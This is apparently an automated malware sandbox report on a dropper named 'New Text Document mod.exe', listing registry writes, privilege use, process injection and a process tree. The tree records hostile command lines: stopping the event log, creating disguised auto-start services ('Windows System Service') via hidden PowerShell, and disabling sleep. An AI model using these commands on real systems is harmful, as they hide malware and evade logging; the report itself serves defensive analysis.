Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 64173fb8d1c5da01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 60b5e2b9d1c5da01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0aeecfb6d1c5da01	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 76d584bad1c5da01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = fceebeb1d1c5da01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

uYtF.exeyondex.exewfbrmcwrltkl.exeama.exeJufrxnb.exe

pid	process
3532	uYtF.exe
3532	uYtF.exe
3532	uYtF.exe
3532	uYtF.exe
3532	uYtF.exe
3532	uYtF.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
3532	uYtF.exe
3532	uYtF.exe
3556	wfbrmcwrltkl.exe
3556	wfbrmcwrltkl.exe
3556	wfbrmcwrltkl.exe
3556	wfbrmcwrltkl.exe
3556	wfbrmcwrltkl.exe
2216	ama.exe
2216	ama.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
1164	Jufrxnb.exe
1164	Jufrxnb.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe
4988	yondex.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

New Text Document mod.exeyondex.exesvchost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeJufrxnb.exeJufrxnb.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exepowercfg.exeDriver.exeJufrxnb.exepowershell.exeama.exepowershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exeMicrosoftEdgeCP.exe

description	pid	process
Token: SeDebugPrivilege	2428	New Text Document mod.exe
Token: SeDebugPrivilege	4988	yondex.exe
Token: SeDebugPrivilege	3472	svchost.exe
Token: SeShutdownPrivilege	4540	powercfg.exe
Token: SeCreatePagefilePrivilege	4540	powercfg.exe
Token: SeShutdownPrivilege	2784	powercfg.exe
Token: SeCreatePagefilePrivilege	2784	powercfg.exe
Token: SeShutdownPrivilege	4768	powercfg.exe
Token: SeCreatePagefilePrivilege	4768	powercfg.exe
Token: SeShutdownPrivilege	2732	powercfg.exe
Token: SeCreatePagefilePrivilege	2732	powercfg.exe
Token: SeDebugPrivilege	420	Jufrxnb.exe
Token: SeDebugPrivilege	5088	Jufrxnb.exe
Token: SeShutdownPrivilege	424	powercfg.exe
Token: SeCreatePagefilePrivilege	424	powercfg.exe
Token: SeShutdownPrivilege	1940	powercfg.exe
Token: SeCreatePagefilePrivilege	1940	powercfg.exe
Token: SeShutdownPrivilege	4348	powercfg.exe
Token: SeCreatePagefilePrivilege	4348	powercfg.exe
Token: SeLockMemoryPrivilege	404	explorer.exe
Token: SeShutdownPrivilege	4904	powercfg.exe
Token: SeCreatePagefilePrivilege	4904	powercfg.exe
Token: SeDebugPrivilege	5088	Jufrxnb.exe
Token: SeLockMemoryPrivilege	4496	Driver.exe
Token: SeLockMemoryPrivilege	4496	Driver.exe
Token: SeDebugPrivilege	1164	Jufrxnb.exe
Token: SeDebugPrivilege	1164	Jufrxnb.exe
Token: SeDebugPrivilege	1556	powershell.exe
Token: SeDebugPrivilege	2216	ama.exe
Token: SeDebugPrivilege	5012	powershell.exe
Token: SeDebugPrivilege	9072	powershell.exe
Token: SeIncreaseQuotaPrivilege	5012	powershell.exe
Token: SeSecurityPrivilege	5012	powershell.exe
Token: SeTakeOwnershipPrivilege	5012	powershell.exe
Token: SeLoadDriverPrivilege	5012	powershell.exe
Token: SeSystemProfilePrivilege	5012	powershell.exe
Token: SeSystemtimePrivilege	5012	powershell.exe
Token: SeProfSingleProcessPrivilege	5012	powershell.exe
Token: SeIncBasePriorityPrivilege	5012	powershell.exe
Token: SeCreatePagefilePrivilege	5012	powershell.exe
Token: SeBackupPrivilege	5012	powershell.exe
Token: SeRestorePrivilege	5012	powershell.exe
Token: SeShutdownPrivilege	5012	powershell.exe
Token: SeDebugPrivilege	5012	powershell.exe
Token: SeSystemEnvironmentPrivilege	5012	powershell.exe
Token: SeRemoteShutdownPrivilege	5012	powershell.exe
Token: SeUndockPrivilege	5012	powershell.exe
Token: SeManageVolumePrivilege	5012	powershell.exe
Token: 33	5012	powershell.exe
Token: 34	5012	powershell.exe
Token: 35	5012	powershell.exe
Token: 36	5012	powershell.exe
Token: SeDebugPrivilege	5428	powershell.exe
Token: SeDebugPrivilege	660	powershell.exe
Token: SeShutdownPrivilege	11088	powercfg.exe
Token: SeCreatePagefilePrivilege	11088	powercfg.exe
Token: SeShutdownPrivilege	9752	powercfg.exe
Token: SeCreatePagefilePrivilege	9752	powercfg.exe
Token: SeShutdownPrivilege	6528	powercfg.exe
Token: SeCreatePagefilePrivilege	6528	powercfg.exe
Token: SeShutdownPrivilege	7728	powercfg.exe
Token: SeCreatePagefilePrivilege	7728	powercfg.exe
Token: SeDebugPrivilege	7700	powershell.exe
Token: SeDebugPrivilege	10884	MicrosoftEdgeCP.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

pid process

3768 MicrosoftEdge.exe
6084 MicrosoftEdgeCP.exe
10884 MicrosoftEdgeCP.exe
6084 MicrosoftEdgeCP.exe

pid	process
3768	MicrosoftEdge.exe
6084	MicrosoftEdgeCP.exe
10884	MicrosoftEdgeCP.exe
6084	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

New Text Document mod.exe0x3fg.exeHkbsse.exesetup.exepic1.execmd.exerolex.exesetup222.exeSetupWizard.exesvchost.exeyondex.exewfbrmcwrltkl.exeJufrxnb.exetaskweaker.exesetup.exe

description	pid	process	target process
PID 2428 wrote to memory of 192	2428	New Text Document mod.exe	0x3fg.exe
PID 2428 wrote to memory of 192	2428	New Text Document mod.exe	0x3fg.exe
PID 2428 wrote to memory of 192	2428	New Text Document mod.exe	0x3fg.exe
PID 192 wrote to memory of 3620	192	0x3fg.exe	Hkbsse.exe
PID 192 wrote to memory of 3620	192	0x3fg.exe	Hkbsse.exe
PID 192 wrote to memory of 3620	192	0x3fg.exe	Hkbsse.exe
PID 2428 wrote to memory of 216	2428	New Text Document mod.exe	setup.exe
PID 2428 wrote to memory of 216	2428	New Text Document mod.exe	setup.exe
PID 3620 wrote to memory of 3532	3620	Hkbsse.exe	uYtF.exe
PID 3620 wrote to memory of 3532	3620	Hkbsse.exe	uYtF.exe
PID 216 wrote to memory of 4620	216	setup.exe	setup.exe
PID 216 wrote to memory of 4620	216	setup.exe	setup.exe
PID 2428 wrote to memory of 4564	2428	New Text Document mod.exe	taskweaker.exe
PID 2428 wrote to memory of 4564	2428	New Text Document mod.exe	taskweaker.exe
PID 2428 wrote to memory of 2216	2428	New Text Document mod.exe	ama.exe
PID 2428 wrote to memory of 2216	2428	New Text Document mod.exe	ama.exe
PID 2428 wrote to memory of 2216	2428	New Text Document mod.exe	ama.exe
PID 2428 wrote to memory of 2868	2428	New Text Document mod.exe	setup222.exe
PID 2428 wrote to memory of 2868	2428	New Text Document mod.exe	setup222.exe
PID 2428 wrote to memory of 1444	2428	New Text Document mod.exe	FirstZ.exe
PID 2428 wrote to memory of 1444	2428	New Text Document mod.exe	FirstZ.exe
PID 2428 wrote to memory of 696	2428	New Text Document mod.exe	pic1.exe
PID 2428 wrote to memory of 696	2428	New Text Document mod.exe	pic1.exe
PID 696 wrote to memory of 1124	696	pic1.exe	cmd.exe
PID 696 wrote to memory of 1124	696	pic1.exe	cmd.exe
PID 1124 wrote to memory of 2068	1124	cmd.exe	rolex.exe
PID 1124 wrote to memory of 2068	1124	cmd.exe	rolex.exe
PID 2068 wrote to memory of 4988	2068	rolex.exe	yondex.exe
PID 2068 wrote to memory of 4988	2068	rolex.exe	yondex.exe
PID 2068 wrote to memory of 4988	2068	rolex.exe	yondex.exe
PID 2868 wrote to memory of 3868	2868	setup222.exe	SetupWizard.exe
PID 2868 wrote to memory of 3868	2868	setup222.exe	SetupWizard.exe
PID 3868 wrote to memory of 2196	3868	SetupWizard.exe	SetupWizard.exe
PID 3868 wrote to memory of 2196	3868	SetupWizard.exe	SetupWizard.exe
PID 2428 wrote to memory of 3472	2428	New Text Document mod.exe	svchost.exe
PID 2428 wrote to memory of 3472	2428	New Text Document mod.exe	svchost.exe
PID 2428 wrote to memory of 3472	2428	New Text Document mod.exe	svchost.exe
PID 3472 wrote to memory of 420	3472	svchost.exe	Jufrxnb.exe
PID 3472 wrote to memory of 420	3472	svchost.exe	Jufrxnb.exe
PID 3472 wrote to memory of 420	3472	svchost.exe	Jufrxnb.exe
PID 4988 wrote to memory of 4496	4988	yondex.exe	Driver.exe
PID 4988 wrote to memory of 4496	4988	yondex.exe	Driver.exe
PID 3556 wrote to memory of 404	3556	wfbrmcwrltkl.exe	explorer.exe
PID 3556 wrote to memory of 404	3556	wfbrmcwrltkl.exe	explorer.exe
PID 3556 wrote to memory of 404	3556	wfbrmcwrltkl.exe	explorer.exe
PID 3556 wrote to memory of 404	3556	wfbrmcwrltkl.exe	explorer.exe
PID 3556 wrote to memory of 404	3556	wfbrmcwrltkl.exe	explorer.exe
PID 5088 wrote to memory of 1164	5088	Jufrxnb.exe	Jufrxnb.exe
PID 5088 wrote to memory of 1164	5088	Jufrxnb.exe	Jufrxnb.exe
PID 5088 wrote to memory of 1164	5088	Jufrxnb.exe	Jufrxnb.exe
PID 4564 wrote to memory of 2252	4564	taskweaker.exe	BitLockerToGo.exe
PID 4564 wrote to memory of 2252	4564	taskweaker.exe	BitLockerToGo.exe
PID 4564 wrote to memory of 2252	4564	taskweaker.exe	BitLockerToGo.exe
PID 4620 wrote to memory of 5072	4620	setup.exe	winsvc.exe
PID 4620 wrote to memory of 5072	4620	setup.exe	winsvc.exe
PID 4564 wrote to memory of 2252	4564	taskweaker.exe	BitLockerToGo.exe
PID 4564 wrote to memory of 2252	4564	taskweaker.exe	BitLockerToGo.exe
PID 2428 wrote to memory of 900	2428	New Text Document mod.exe	pic15.exe
PID 2428 wrote to memory of 900	2428	New Text Document mod.exe	pic15.exe
PID 2428 wrote to memory of 2424	2428	New Text Document mod.exe	limba.exe
PID 2428 wrote to memory of 2424	2428	New Text Document mod.exe	limba.exe
PID 2428 wrote to memory of 2424	2428	New Text Document mod.exe	limba.exe
PID 2428 wrote to memory of 1116	2428	New Text Document mod.exe	ChatLife.exe
PID 2428 wrote to memory of 1116	2428	New Text Document mod.exe	ChatLife.exe

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2428
- C:\Users\Admin\AppData\Local\Temp\a\0x3fg.exe
  "C:\Users\Admin\AppData\Local\Temp\a\0x3fg.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:192
- - C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
    "C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3620
  - - C:\Users\Admin\AppData\Roaming\1000001000\uYtF.exe
      "C:\Users\Admin\AppData\Roaming\1000001000\uYtF.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:3532
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2784
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2732
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4768
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4540
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "xjuumoinznsp"
        5⤵
        Launches sc.exe
        
        PID:4560
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "xjuumoinznsp" binpath= "C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:5048
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:4972
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "xjuumoinznsp"
        5⤵
        Launches sc.exe
        
        PID:3704
- C:\Users\Admin\AppData\Local\Temp\a\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\a\setup.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:216
- - C:\Users\Admin\AppData\Local\Temp\setup-efb63c8260d5d45b\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup-efb63c8260d5d45b\setup.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    PID:4620
  - - C:\Windows\system32\winsvc.exe
      "C:\Windows\system32\winsvc.exe" "C:\Users\Admin\AppData\Local\Temp\setup-efb63c8260d5d45b\setup.exe"
      4⤵
      Executes dropped EXE
      PID:5072
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "create" "winsvc" "type=own" "start=auto" "error=ignore" "binPath=\"C:\Windows\system32\winsvc.exe\"" "DisplayName=\"Windows System Service\""
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:9072
      - C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" create winsvc type=own start=auto error=ignore binPath=C:\Windows\system32\winsvc.exe "DisplayName=Windows System Service"
        6⤵
        Launches sc.exe
        
        PID:2412
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "failure" "winsvc" "reset=0" "actions=restart/0/restart/0/restart/0"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5428
      - C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" failure winsvc reset=0 actions=restart/0/restart/0/restart/0
        6⤵
        Launches sc.exe
        
        PID:7892
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "description" "winsvc" "\"Windows System Service is the main system supervision service.\""
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:660
      - C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" description winsvc "Windows System Service is the main system supervision service."
        6⤵
        Launches sc.exe
        
        PID:10140
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "start" "winsvc"
        5⤵
        Command and Scripting Interpreter: PowerShell
